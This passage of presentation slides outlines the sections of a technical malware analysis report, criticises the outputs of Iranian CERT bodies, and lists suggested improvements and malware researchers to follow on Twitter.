  • 35. MALWARE REPORT TECHNICAL • Summery – If (Init Access) – Category (Ransome, Rootkit, Bootkit) • File Metadata Information – Filename – MD5 Hash – File Type – File Size – SHA256 – PE Information / File less • Static Analysis – Domain / IP – Obfuscation and Encryption – Anti Reverse / Anti Sandbox • Dynamic Analysis – Execution – Connection to C&C – Logs – Traffic – YARA rule Reports : https://isc.sans.edu/diary/26750 https://isc.sans.edu/diary/26744 https://us-cert.cisa.gov/ncas/alerts/aa20-302a
  • 36. WEAKNESSES CERT.IR / AFTA • Very bad style report • Ant activity in social media network • Ant activity in github • There isn’t content for cyber security • Copy & Paste news
  • 37. SOLUTION • Activity in twitter • Activity in Github repo Open Source ( YARA ) • “Infrastructure Bug Bounty” (IBB) • Own Researching (Cafebazaar / p30download / soft98) • Publish on tools in Malware Analysis
  • 38. HOW TO WORK WITH OTHER RESEARCHER? EXAMPLE
  • 39. SHOULD FOLLOWING IN TWITTER • https://twitter.com/executemalware • https://twitter.com/malware_traffic • https://twitter.com/JRoosen • https://twitter.com/HONKONE_K • https://twitter.com/3xp0rtblog • https://twitter.com/mal_share • https://twitter.com/RedDrip7 • https://twitter.com/Arkbird_SOLG • https://twitter.com/MalwarePatrol • https://twitter.com/DidierStevens • https://twitter.com/CyberIOCs • https://twitter.com/DissectMalware • https://twitter.com/MITREattack • https://twitter.com/Ledtech3 • https://twitter.com/VK_Intel